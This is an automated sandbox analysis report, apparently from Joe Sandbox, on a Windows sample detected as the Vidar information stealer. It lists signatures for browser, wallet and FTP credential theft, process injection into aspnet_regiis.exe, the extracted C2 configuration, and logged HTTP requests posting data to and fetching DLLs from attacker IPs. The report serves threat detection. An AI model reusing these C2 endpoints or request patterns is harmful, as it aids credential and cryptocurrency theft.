Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1524654
MD5: d5251bd2a4d9ee464b1dbb25245a67a7
SHA1: a89c28d0c6f39475cf96c2129c4d10d73d0aa4b4
SHA256: 5aa5f829532b82d1d146841d843de9d3ab2278ba2c52402d51d18a5a2823872f
Tags: exe, user-Bitsight

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D5251BD2A4D9EE464B1DBB25245A67A7)
    • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 1420 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b74ef0d8ce56e494b0d83e1d5be9dbeb"}

Yara signature matches (PCAP)

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Yara signature matches (memory dumps)

Source | Rule | Description | Author | Strings
00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

Yara signature matches (unpacked PE files)

Source | Rule | Description | Author | Strings
3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpack | HiddenCobra_BANKSHOT_Gen | Detects Hidden Cobra BANKSHOT trojan | Florian Roth | 0x1e6ae:$x5: vchost.exe
3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpack | HiddenCobra_BANKSHOT_Gen | Detects Hidden Cobra BANKSHOT trojan | Florian Roth | 0x202b6:$x5: vchost.exe
0.2.file.exe.6d5e2000.6.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.6d5e2000.6.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
0.2.file.exe.6d5e2000.6.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

No Sigma rule has matched

Suricata alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T03:26:45.002063+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49712 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:46.181996+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49713 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:47.706893+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49714 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:49.063115+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49715 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:50.472209+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49716 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:51.910409+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49717 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:53.184930+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49718 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:56.335592+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49719 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:57.427072+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49720 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:59.780100+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49721 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:01.221985+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49722 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:03.387792+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49723 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:06.072223+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49724 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:08.017523+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49725 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:09.758776+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49726 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:11.287167+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49727 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:14.650634+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49729 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:16.347761+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49730 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:17.745181+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49731 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:19.571326+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49732 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:21.565877+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49733 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:23.962749+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.9 | 49734 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:49.759104+0200 | 2044247 | 1 | Malware Command and Control Activity Detected | 49.12.197.9 | 443 | 192.168.2.9 | 49715 | TCP
2024-10-03T03:26:51.174591+0200 | 2051831 | 1 | Malware Command and Control Activity Detected | 49.12.197.9 | 443 | 192.168.2.9 | 49716 | TCP
2024-10-03T03:26:48.401039+0200 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.9 | 49714 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:25.798987+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49735 | 147.45.44.104 | 80 | TCP

                      AV Detection

Source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b74ef0d8ce56e494b0d83e1d5be9dbeb"}
Source: file.exe, Virustotal: Detection: 30%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\msvcp110.dll, Joe Sandbox ML: detected
Source: file.exe, Joe Sandbox ML: detected
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A080A1 CryptUnprotectData,LocalAlloc,LocalFree,3_2_02A080A1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A08048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_02A08048
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A11E5D CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_02A11E5D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0A7D8 _memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcat,PK11_FreeSlot,lstrcat,3_2_02A0A7D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA76C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6CA76C80
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.9:49712 version: TLS 1.2
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                      Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                      Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                      Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                      Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2672994085.000000003A0B1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2668214599.000000002E1D7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                      Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                      Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5D38ED FindFirstFileExW,0_2_6D5D38ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A15FD1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_02A0BF4D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A14CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_02A14CC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_02A1543D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A01D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A01D80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0D5C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_02A0B5DF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A09D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A09D1C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15B0B GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_02A15B0B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0B93F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_02A0CD37
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_02A15142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_02A014AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_02A014AD

                      Networking

                      Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.9:49714 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.9:49715
                      Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.9:49716
                      Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View, IP Address: 49.12.197.9
Source: Joe Sandbox View, IP Address: 104.102.49.254
Source: Joe Sandbox View, IP Address: 147.45.44.104
Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
Source: Joe Sandbox View, ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49715 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49718 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49713 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49712 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49714 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49717 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49716 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49721 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49722 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49719 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49720 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49723 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49724 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49725 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49727 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49726 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49731 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49732 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49733 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49734 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49735 -> 147.45.44.104:80
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49729 -> 49.12.197.9:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49730 -> 49.12.197.9:443
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6897Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
